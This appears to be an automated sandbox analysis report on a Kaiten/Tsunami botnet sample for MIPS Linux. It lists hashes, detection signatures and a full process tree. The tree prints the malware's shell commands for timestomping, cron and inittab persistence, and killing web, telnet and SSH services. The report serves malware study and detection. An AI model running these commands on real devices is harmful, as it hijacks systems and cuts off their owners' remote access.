Analysis
-
max time kernel
19s -
max time network
12s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
20-10-2024 07:46
Static task
static1
Behavioral task
behavioral1
Sample
2a02cf799a0231ff1faf3f5a02f4399fbe4492f0d68081e27f93c181b37731f1
Resource
debian9-mipsbe-20240611-en
General
-
Target
2a02cf799a0231ff1faf3f5a02f4399fbe4492f0d68081e27f93c181b37731f1
-
Size
510KB
-
MD5
5d75670fdc5531ef09ec12de7fa8ab34
-
SHA1
8695057628cf9a12f97e260694dbfc50138cf0dd
-
SHA256
2a02cf799a0231ff1faf3f5a02f4399fbe4492f0d68081e27f93c181b37731f1
-
SHA512
6fd21a9554f00e4ab77401048a6a6361b1aa0c991ddfdd8a2b4938f4f95690dbd62c5c3b56b819fce10c0953a56a2e99d7d618778f269c5dd496e87ee7c91ea1
-
SSDEEP
12288:6N/85i/pHqAyIJQenHqDsOnXRQI6Z6udA56hsrIr5H+NIG/:oQcpKLK7oan7d00r5eX
Malware Config
Signatures
-
Detects Kaiten/Tsunami Payload 1 IoCs
resource yara_rule behavioral1/memory/712-1-0x00400000-0x00568718-memory.dmp family_kaiten2 -
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
description ioc Process File opened for modification /var/spool/cron/crontabs/tmp.fUi7Ok crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
Indicator Removal: Timestomp 1 TTPs 4 IoCs
Adversaries may remove indicators of compromise from the host to evade detection.
pid Process 756 sh 757 touch 720 sh 723 touch -
Enumerates kernel/hardware configuration 1 TTPs 9 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
description ioc Process File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl -
description ioc Process File opened for reading /proc/704/stat killall File opened for reading /proc/784/stat killall File opened for reading /proc/235/stat killall File opened for reading /proc/473/stat killall File opened for reading /proc/6/stat killall File opened for reading /proc/14/stat killall File opened for reading /proc/72/stat killall File opened for reading /proc/321/stat killall File opened for reading /proc/11/stat killall File opened for reading /proc/20/stat killall File opened for reading /proc/1/environ systemctl File opened for reading /proc/721/cmdline killall File opened for reading /proc/3/stat killall File opened for reading /proc/6/stat killall File opened for reading /proc/759/cmdline killall File opened for reading /proc/18/stat killall File opened for reading /proc/705/cmdline killall File opened for reading /proc/77/stat killall File opened for reading /proc/812/stat killall File opened for reading /proc/16/stat killall File opened for reading /proc/777/stat killall File opened for reading /proc/380/stat killall File opened for reading /proc/18/stat killall File opened for reading /proc/72/stat killall File opened for reading /proc/14/stat killall File opened for reading /proc/83/stat killall File opened for reading /proc/480/stat killall File opened for reading /proc/cmdline systemctl File opened for reading /proc/74/stat killall File opened for reading /proc/13/stat killall File opened for reading /proc/775/stat killall File opened for reading /proc/139/stat killall File opened for reading /proc/322/stat killall File opened for reading /proc/480/stat killall File opened for reading /proc/76/stat killall File opened for reading /proc/78/stat killall File opened for reading /proc/76/stat killall File opened for reading /proc/16/stat killall File opened for reading /proc/14/stat killall File opened for reading /proc/1/environ systemctl File opened for reading /proc/81/stat killall File opened for reading /proc/704/cmdline killall File opened for reading /proc/705/cmdline killall File opened for reading /proc/796/stat killall File opened for reading /proc/806/stat killall File opened for reading /proc/1/stat killall File opened for reading /proc/480/stat killall File opened for reading /proc/11/stat killall File opened for reading /proc/139/cmdline killall File opened for reading /proc/508/stat killall File opened for reading /proc/10/stat killall File opened for reading /proc/16/stat killall File opened for reading /proc/77/stat killall File opened for reading /proc/235/stat killall File opened for reading /proc/709/stat killall File opened for reading /proc/filesystems crontab File opened for reading /proc/18/stat killall File opened for reading /proc/69/stat killall File opened for reading /proc/759/stat killall File opened for reading /proc/5/stat killall File opened for reading /proc/759/stat killall File opened for reading /proc/235/stat killall File opened for reading /proc/cmdline systemctl File opened for reading /proc/759/stat killall
Processes
-
/tmp/2a02cf799a0231ff1faf3f5a02f4399fbe4492f0d68081e27f93c181b37731f1/tmp/2a02cf799a0231ff1faf3f5a02f4399fbe4492f0d68081e27f93c181b37731f11⤵PID:712
-
/bin/shsh -c "touch -acmr /bin/ls /tmp/2a02cf799a0231ff1faf3f5a02f4399fbe4492f0d68081e27f93c181b37731f1"2⤵
- Indicator Removal: Timestomp
PID:720 -
/usr/bin/touchtouch -acmr /bin/ls /tmp/2a02cf799a0231ff1faf3f5a02f4399fbe4492f0d68081e27f93c181b37731f13⤵
- Indicator Removal: Timestomp
PID:723
-
-
-
/bin/shsh -c "(crontab -l | grep -v \"/tmp/2a02cf799a0231ff1faf3f5a02f4399fbe4492f0d68081e27f93c181b37731f1\" | grep -v \"no cron\" | grep -v \"lesshts/run.sh\" > /var/run/.x00740882966) > /dev/null 2>&1"2⤵PID:725
-
/usr/bin/crontabcrontab -l3⤵
- Reads runtime system information
PID:727
-
-
/bin/grepgrep -v "no cron"3⤵PID:729
-
-
/bin/grepgrep -v /tmp/2a02cf799a0231ff1faf3f5a02f4399fbe4492f0d68081e27f93c181b37731f13⤵PID:728
-
-
/bin/grepgrep -v lesshts/run.sh3⤵PID:730
-
-
-
/bin/shsh -c "echo \"* * * * * /tmp/2a02cf799a0231ff1faf3f5a02f4399fbe4492f0d68081e27f93c181b37731f1 > /dev/null 2>&1 &\" >> /var/run/.x00740882966"2⤵PID:734
-
-
/bin/shsh -c "crontab /var/run/.x00740882966"2⤵PID:735
-
/usr/bin/crontabcrontab /var/run/.x007408829663⤵
- Creates/modifies Cron job
PID:737
-
-
-
/bin/shsh -c "rm -rf /var/run/.x00740882966"2⤵PID:741
-
/bin/rmrm -rf /var/run/.x007408829663⤵PID:743
-
-
-
/bin/shsh -c "cat /etc/inittab | grep -v \"/tmp/2a02cf799a0231ff1faf3f5a02f4399fbe4492f0d68081e27f93c181b37731f1\" > /etc/inittab2"2⤵PID:744
-
/bin/catcat /etc/inittab3⤵PID:746
-
-
/bin/grepgrep -v /tmp/2a02cf799a0231ff1faf3f5a02f4399fbe4492f0d68081e27f93c181b37731f13⤵PID:747
-
-
-
/bin/shsh -c "echo \"0:2345:respawn:/tmp/2a02cf799a0231ff1faf3f5a02f4399fbe4492f0d68081e27f93c181b37731f1\" >> /etc/inittab2"2⤵PID:750
-
-
/bin/shsh -c "cat /etc/inittab2 > /etc/inittab"2⤵PID:751
-
/bin/catcat /etc/inittab23⤵PID:752
-
-
-
/bin/shsh -c "rm -rf /etc/inittab2"2⤵PID:753
-
/bin/rmrm -rf /etc/inittab23⤵PID:754
-
-
-
/bin/shsh -c "touch -acmr /bin/ls /etc/inittab"2⤵
- Indicator Removal: Timestomp
PID:756 -
/usr/bin/touchtouch -acmr /bin/ls /etc/inittab3⤵
- Indicator Removal: Timestomp
PID:757
-
-
-
/bin/shsh -c "/bin/uname -n"2⤵PID:760
-
/bin/uname/bin/uname -n3⤵PID:761
-
-
-
/bin/shsh -c "/bin/uname -n"2⤵PID:762
-
/bin/uname/bin/uname -n3⤵PID:763
-
-
-
/bin/shsh -c "/bin/uname -n"2⤵PID:764
-
/bin/uname/bin/uname -n3⤵PID:766
-
-
-
/bin/shsh -c "kill -9 `cat /var/run/httpd.pid` > /dev/null 2>&1 &"2⤵PID:771
-
/bin/catcat /var/run/httpd.pid3⤵PID:774
-
-
-
/bin/shsh -c "service httpd stop > /dev/null 2>&1 &"2⤵PID:773
-
-
/bin/shsh -c "killall -9 mini_httpd > /dev/null 2>&1 &"2⤵PID:776
-
-
/bin/shsh -c "killall -9 minihttpd > /dev/null 2>&1 &"2⤵PID:778
-
-
/bin/shsh -c "kill -9 `cat /var/run/thttpd.pid` > /dev/null 2>&1 &"2⤵PID:781
-
/bin/catcat /var/run/thttpd.pid3⤵PID:785
-
-
-
/bin/shsh -c "nvram set httpd_enable=0 > /dev/null 2>&1"2⤵PID:784
-
-
/bin/shsh -c "nvram set http_enable=0 > /dev/null 2>&1"2⤵PID:787
-
-
/bin/shsh -c "killall -9 httpd > /dev/null 2>&1 &"2⤵PID:788
-
-
/bin/shsh -c "service telnetd stop > /dev/null 2>&1 &"2⤵PID:790
-
-
/bin/shsh -c "service sshd stop > /dev/null 2>&1 &"2⤵PID:794
-
-
/bin/shsh -c "killall -9 telnetd > /dev/null 2>&1 &"2⤵PID:797
-
-
/bin/shsh -c "killall -9 utelnetd > /dev/null 2>&1 &"2⤵PID:800
-
-
/bin/shsh -c "killall -9 dropbear > /dev/null 2>&1 &"2⤵PID:804
-
-
/bin/shsh -c "killall -9 sshd > /dev/null 2>&1 &"2⤵PID:807
-
-
/bin/shsh -c "killall -9 lighttpd > /dev/null 2>&1 &"2⤵PID:810
-
-
/usr/sbin/serviceservice httpd stop1⤵PID:775
-
/usr/bin/basenamebasename /usr/sbin/service2⤵PID:779
-
-
/usr/bin/basenamebasename /usr/sbin/service2⤵PID:782
-
-
/bin/systemctlsystemctl --quiet is-active multi-user.target2⤵
- Enumerates kernel/hardware configuration
PID:786
-
-
/bin/systemctlsystemctl list-unit-files --full "--type=socket"2⤵
- Enumerates kernel/hardware configuration
PID:793
-
-
/bin/sedsed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"2⤵PID:795
-
-
/usr/bin/killallkillall -9 mini_httpd1⤵
- Reads runtime system information
PID:777
-
/usr/bin/killallkillall -9 minihttpd1⤵
- Reads runtime system information
PID:780
-
/usr/bin/killallkillall -9 httpd1⤵
- Reads runtime system information
PID:789
-
/usr/sbin/serviceservice telnetd stop1⤵PID:791
-
/usr/bin/basenamebasename /usr/sbin/service2⤵PID:798
-
-
/usr/bin/basenamebasename /usr/sbin/service2⤵PID:802
-
-
/bin/systemctlsystemctl --quiet is-active multi-user.target2⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:808
-
-
/bin/systemctlsystemctl list-unit-files --full "--type=socket"2⤵
- Enumerates kernel/hardware configuration
PID:816
-
-
/bin/sedsed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"2⤵PID:817
-
-
/usr/sbin/serviceservice sshd stop1⤵PID:796
-
/usr/bin/basenamebasename /usr/sbin/service2⤵PID:801
-
-
/usr/bin/basenamebasename /usr/sbin/service2⤵PID:805
-
-
/bin/systemctlsystemctl --quiet is-active multi-user.target2⤵
- Enumerates kernel/hardware configuration
PID:811
-
-
/bin/systemctlsystemctl list-unit-files --full "--type=socket"2⤵
- Enumerates kernel/hardware configuration
PID:819
-
-
/bin/sedsed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"2⤵PID:820
-
-
/usr/bin/killallkillall -9 telnetd1⤵
- Reads runtime system information
PID:799
-
/usr/bin/killallkillall -9 utelnetd1⤵
- Reads runtime system information
PID:803
-
/usr/local/sbin/systemctlsystemctl "--job-mode=ignore-dependencies" stop httpd.service1⤵PID:775
-
/usr/local/bin/systemctlsystemctl "--job-mode=ignore-dependencies" stop httpd.service1⤵PID:775
-
/usr/sbin/systemctlsystemctl "--job-mode=ignore-dependencies" stop httpd.service1⤵PID:775
-
/usr/bin/systemctlsystemctl "--job-mode=ignore-dependencies" stop httpd.service1⤵PID:775
-
/sbin/systemctlsystemctl "--job-mode=ignore-dependencies" stop httpd.service1⤵PID:775
-
/bin/systemctlsystemctl "--job-mode=ignore-dependencies" stop httpd.service1⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:775
-
/usr/bin/killallkillall -9 dropbear1⤵
- Reads runtime system information
PID:806
-
/usr/bin/killallkillall -9 sshd1⤵
- Reads runtime system information
PID:809
-
/usr/bin/killallkillall -9 lighttpd1⤵
- Reads runtime system information
PID:812
-
/usr/local/sbin/systemctlsystemctl "--job-mode=ignore-dependencies" stop telnetd.service1⤵PID:791
-
/usr/local/bin/systemctlsystemctl "--job-mode=ignore-dependencies" stop telnetd.service1⤵PID:791
-
/usr/sbin/systemctlsystemctl "--job-mode=ignore-dependencies" stop telnetd.service1⤵PID:791
-
/usr/bin/systemctlsystemctl "--job-mode=ignore-dependencies" stop telnetd.service1⤵PID:791
-
/sbin/systemctlsystemctl "--job-mode=ignore-dependencies" stop telnetd.service1⤵PID:791
-
/bin/systemctlsystemctl "--job-mode=ignore-dependencies" stop telnetd.service1⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:791
-
/usr/local/sbin/systemctlsystemctl "--job-mode=ignore-dependencies" stop sshd.service1⤵PID:796
-
/usr/local/bin/systemctlsystemctl "--job-mode=ignore-dependencies" stop sshd.service1⤵PID:796
-
/usr/sbin/systemctlsystemctl "--job-mode=ignore-dependencies" stop sshd.service1⤵PID:796
-
/usr/bin/systemctlsystemctl "--job-mode=ignore-dependencies" stop sshd.service1⤵PID:796
-
/sbin/systemctlsystemctl "--job-mode=ignore-dependencies" stop sshd.service1⤵PID:796
-
/bin/systemctlsystemctl "--job-mode=ignore-dependencies" stop sshd.service1⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:796
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
85B
MD564d27c0537149a56cdb8523e1788165d
SHA1f97277c411ae7d8f8a29273ba350354edd8bb7ba
SHA256424ae8d6d745d605066cd998839960610fc89db729b661302b906a64dc9a03f6
SHA51222fcfc86634f9890d6b1b3ada638056246183c1add2c24d963ebe32de0ceb0215a5ca9a67b523fdedb317feb6f1def6fea724eec9a09aa5c8219b8c0ebf31b10
-
Filesize
99B
MD52fbba492e00bc251961957fc02be650b
SHA1fc235925acf63d5c4984c23276121925b3d36ca7
SHA256a5203fec4e7b3593af2f746cbae83019a012536cc24e4dc9a3bcb4e8bc3248f4
SHA5125ce23151c6ad61f09a0df3064d6a9bd33c901810eaafc549eec2b9fba13193a35af1f99fc1fa573d2a95a3edf35ef4d6089f762c278d2ac5f2eb763c6e014f53
-
Filesize
295B
MD5c9a0cbc88dc1235bbc6284b887a0d2c2
SHA1631727e95ca35b2d759cae81b952c083bc13fb62
SHA256e84614442cfffb22a039c4c912b6d578b239bdca5b5225a4e3f5365ebaf6875a
SHA512b79f8c174d71fac1e6bc52956b8aec2a9b3f3dbe5d066ae4fcee4d5825d9855c73d8ba54beb28308d7f46950d943f640a00cf845b6e720c48251ed9fe559a90e